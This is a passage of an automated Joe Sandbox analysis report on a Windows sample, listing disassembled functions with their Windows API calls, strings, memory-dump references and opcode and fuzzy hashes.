Instruction Fuzzy Hash: E911C1B2414309AFD7189F64EC86E6AB7BDEF44714B20852EE05657241EBB0FC918A60

Function 0024D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0024D608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0024D645
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0024D650

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: f776d3be963d7daedbc3774399305a32368b4b3bcebdf9d1eb668b2a76ffea73
Instruction ID: 61abf71a7a905ff8a439f419700deb4dc68bc80e41ba39f68664cc0625a068f9
Opcode Fuzzy Hash: f776d3be963d7daedbc3774399305a32368b4b3bcebdf9d1eb668b2a76ffea73
Instruction Fuzzy Hash: 9B116575E05228BFDB148FA9EC49FAFBFBCEB45B50F104165F908E7290D6704A058BA1

Function 00241663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0024168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 002416A1
FreeSid.ADVAPI32(?), ref: 002416B1

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 2f5839f780ea1ab41441d27d03dbab856b5ac95ad1163f0b45c5d6cb79c463ba
Instruction ID: acbde2468cb4ce9f577f7d0043cd45e869c855a2f16fae6196cd6285a9102eb5
Opcode Fuzzy Hash: 2f5839f780ea1ab41441d27d03dbab856b5ac95ad1163f0b45c5d6cb79c463ba
Instruction Fuzzy Hash: CBF0F471950319FBDB00DFF4AC89EAEBBBCFB08604F504565E501E2181E774AA848BA0

Function 00204CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(002128E9,?,00204CBE,002128E9,002A88B8,0000000C,00204E15,002128E9,00000002,00000000,?,002128E9), ref: 00204D09
TerminateProcess.KERNEL32(00000000,?,00204CBE,002128E9,002A88B8,0000000C,00204E15,002128E9,00000002,00000000,?,002128E9), ref: 00204D10
ExitProcess.KERNEL32 ref: 00204D22

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 71c26a2eb7c9619d8a067a321df6f37ea257658018f1b75c851d73a06d7a0816
Instruction ID: 8b6315ae938c0dec700251bfa539c8adc369d0546680c83f911b1d91df24ae01
Opcode Fuzzy Hash: 71c26a2eb7c9619d8a067a321df6f37ea257658018f1b75c851d73a06d7a0816
Instruction Fuzzy Hash: C2E0B671010248BBCF11BF64ED0DA583B6AEB45785B208058FD099A173CB35DDA2CA80

Function 0021C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 0021C36C

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 7757c26dd8dedab0441df7beca3cf94d6dad586abf646411d3925acf68952cfe
Instruction ID: b3b174ea77ef3291e816ad06333578448d73d1b84368fcdf64a6da01fa7545ec
Opcode Fuzzy Hash: 7757c26dd8dedab0441df7beca3cf94d6dad586abf646411d3925acf68952cfe
Instruction Fuzzy Hash: 7941367A950219AFCB24AFB9DC48EFB77B8EB94314F2042A9F915C7180E6709DD1CB50

Function 0023D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 0023D28C

Strings

X64, xrefs: 0023D2A8

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: 98e1c2f0fd2ba1abd1232ca1981094747416c9bafc6d18866b63d04b5c6f7bd6
Instruction ID: ded7fa040df7b71f90ab100ca101d5fb9d53cf5348cce6269361e506b12e5993
Opcode Fuzzy Hash: 98e1c2f0fd2ba1abd1232ca1981094747416c9bafc6d18866b63d04b5c6f7bd6
Instruction Fuzzy Hash: 1FD0C9B481111DEADF94CBA0EC88DEAB37CBB04305F100155F506A2000DB7095488F10

Function 0020CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction ID: 53c0826c62041fe1241f46f99fb7e3d624f6f0c1f357656dc1653909ced9dd21
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: CC022EB1E1021A9FDF14CFA9C8806ADFBF5FF48324F25426AD819E7385D730A9518B84

Function 001ECAF0 Relevance: 3.2, Strings: 2, Instructions: 659COMMON

Download Yara Rule

Strings

p#+, xrefs: 001ECF7F
Variable is not of type 'Object'., xrefs: 00230C40

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.$p#+
API String ID: 0-4251930221
Opcode ID: 7a229a235cd3b54ca2465d3efd887c19a5f5217211f070f69a48d8d2a3e1c86e
Instruction ID: a8cf847a7df903bfdff47f8bc3e2313b1988d84e8a173d86115066f596c30962
Opcode Fuzzy Hash: 7a229a235cd3b54ca2465d3efd887c19a5f5217211f070f69a48d8d2a3e1c86e
Instruction Fuzzy Hash: 0232BD70910659DFCF18DF95CC90AEDB7B5FF14304F248059E806AB292DB75AE46CBA0

Function 002568EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00256918
FindClose.KERNEL32(00000000), ref: 00256961

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 45adb710c4bdeafadc9175657efa0ae4eb1237ef2c3b4fdb9d8f1a3addbc9e3b
Instruction ID: d9512208cec76d9294ee6febe6f91476032f0dcf20f95e7cf89f3a912e07dbb5
Opcode Fuzzy Hash: 45adb710c4bdeafadc9175657efa0ae4eb1237ef2c3b4fdb9d8f1a3addbc9e3b
Instruction Fuzzy Hash: 9011D3316146419FC710CF29D888A1ABBE0FF84329F54C69DE8698F2A2CB30EC45CB91

Function 002537B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00264891,?,?,00000035,?), ref: 002537E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00264891,?,?,00000035,?), ref: 002537F4

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 63fae263219c9774c957cd258340a48fd537af178a6da0513d4ac69ba0fd6fcf
Instruction ID: 24dc457e0d990aebfef5c36ed0848dcdc18a1226210534378b6187108f8f1cb5
Opcode Fuzzy Hash: 63fae263219c9774c957cd258340a48fd537af178a6da0513d4ac69ba0fd6fcf
Instruction Fuzzy Hash: B1F0EC706143253AE72057765C4DFDB769DDFC4761F100165F909D3281D9705944C7B0

Function 0024B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0024B25D
keybd_event.USER32(?,7694C0D0,?,00000000), ref: 0024B270

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: f5a48fb19f96073b88f854416b1d757d19890c12481bfeee0ee48bb00d8cc80a
Instruction ID: c4c2f8eaf7d7675ee4a9024c014bf9fad646d3a770a5495596d9b44f11869c91
Opcode Fuzzy Hash: f5a48fb19f96073b88f854416b1d757d19890c12481bfeee0ee48bb00d8cc80a
Instruction Fuzzy Hash: ABF01D7181424EABDB05DFA0D805BAE7BB4FF04305F108009F955A5191D7B9C651DF94

Function 002410BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002411FC), ref: 002410D4
CloseHandle.KERNEL32(?,?,002411FC), ref: 002410E9

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 9024336ae287ab1a9e82e11a82e8d3dc7374829ca49bfc6d0ec60aafe5b0a44b
Instruction ID: d1e4af27a79f8c7c3e4058147912bdfa9cd1338328b856b179a0bae55d0affa6
Opcode Fuzzy Hash: 9024336ae287ab1a9e82e11a82e8d3dc7374829ca49bfc6d0ec60aafe5b0a44b
Instruction Fuzzy Hash: 7EE0BF72018611AEF7252B61FC09E7777A9EF04310B24882DF5A5804B1DBA26CE1DB50

Function 0021676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00216766,?,?,00000008,?,?,0021FEFE,00000000), ref: 00216998

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: c0b24aef1377c3d1b8a86972f90c344ed137c8cf9cea0f3f970501c8a61421f2
Instruction ID: 3c7a9d8d68baabccc0f8aefb65fae520d41a6be5986b66187207e21ee07c63d1
Opcode Fuzzy Hash: c0b24aef1377c3d1b8a86972f90c344ed137c8cf9cea0f3f970501c8a61421f2
Instruction Fuzzy Hash: E1B14D31520609DFD715CF28C48ABA97BE0FF55364F29C658E899CF2A2C335D9A5CB40

Function 001FB119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 0023851F

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: c068e9f9115d249b132a151236c4cfb81729fc111e41a066ce2485b5b136c44c
Instruction ID: 8dcf82cba86a91b3797f9149fd72e7ecc3952e4bb788fcd7a4ddc137a7da3870
Opcode Fuzzy Hash: c068e9f9115d249b132a151236c4cfb81729fc111e41a066ce2485b5b136c44c
Instruction Fuzzy Hash: A8126EB19142299BCB14CF58C980AFEB7F5FF48710F15819AE949EB251EB309E91CF90

Function 0025EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 0025EABD

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 1cd6599b57a1d550b152436f5da6ad9f241255298e3a271589a9936a2d5127e9
Instruction ID: 5493318d3a9175c4f9ada4f2b4878803fe4085c90bb3dfc39c7a82675ca66d30
Opcode Fuzzy Hash: 1cd6599b57a1d550b152436f5da6ad9f241255298e3a271589a9936a2d5127e9
Instruction Fuzzy Hash: BBE04F712102049FC710EF6AE844E9AF7EDBFA8760F01841AFD4AC7351DBB0E9458B90

Function 002009D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,002003EE), ref: 002009DA

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 715f3b5f37bc3f4ccf5a13b7e7ad7771aef90a7afb6e95db4f4bbf72a7f7eaf0
Instruction ID: 99300aa6af827ded96e027db54cf70dedf7058fbe2c4f54318db634035b66c73
Opcode Fuzzy Hash: 715f3b5f37bc3f4ccf5a13b7e7ad7771aef90a7afb6e95db4f4bbf72a7f7eaf0
Instruction Fuzzy Hash:

Function 0020781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 0020798B

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: d6e5f819e4226f9935835e5d1f30cc6303ca8209ff75bab75419f6ca69dff900
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: 9C516961E3C74B5BDB388D68885D7BF23999B42300F188519D882C72C3C661FE75E762

Function 00252046 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

0&+, xrefs: 00252053

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID:
String ID: 0&+
API String ID: 0-3024635622
Opcode ID: 1d48b072b458ad574b97c86e23ddbc0fcbf2b86c89dba73831e1feb6a4e9155e
Instruction ID: 9a118a857a3a06c625b2a1a03070931a747465829c9fa9c3a8c4dea0054568bd
Opcode Fuzzy Hash: 1d48b072b458ad574b97c86e23ddbc0fcbf2b86c89dba73831e1feb6a4e9155e
Instruction Fuzzy Hash: 7F21A832621611CBDB28CE79C81267E73E5A764310F15862EE4A7C77D1DE35A908CB44

Function 00216DD9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b39734f14c6be3df49c479b44304252f253ad4d7a35e88d25aff2c926238e9d
Instruction ID: c6f794bc2789d975103d27a899bdda00a5ade5b8de5c4fa36db2cdcdf49fc927
Opcode Fuzzy Hash: 2b39734f14c6be3df49c479b44304252f253ad4d7a35e88d25aff2c926238e9d
Instruction Fuzzy Hash: C8322335D3AF018DD7239634D826336A699AFB73C5F15C737E81AB59A6EB29C4C34200

Function 001FCC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f300da451992b99542907e3bbe60d0da4079c277394a72bfa33f3d3cc1dadcb
Instruction ID: c356d53be874be87ef73e2a45e8ab6bc1840d0a2be1453ed7b69cb0af17e4285
Opcode Fuzzy Hash: 9f300da451992b99542907e3bbe60d0da4079c277394a72bfa33f3d3cc1dadcb
Instruction Fuzzy Hash: D5326BB2A2415E8BCF28CF28C59467DB7A1EF45314F38852BD949EB291D730DDA1EB40

Function 001E7920 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 062333cbd782aa8cd17e73854a30554bc02f475c841bee216e2624d973be2507
Instruction ID: 351c7fe965e2621618184b66c6647f43f9911bddaaccf1c2d7dc8479d22e521e
Opcode Fuzzy Hash: 062333cbd782aa8cd17e73854a30554bc02f475c841bee216e2624d973be2507
Instruction Fuzzy Hash: 9522E570A14A1AEFEF14CFA5D881AAEB3F5FF54300F148129E816E7291EB359D61CB50

Function 001E91C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

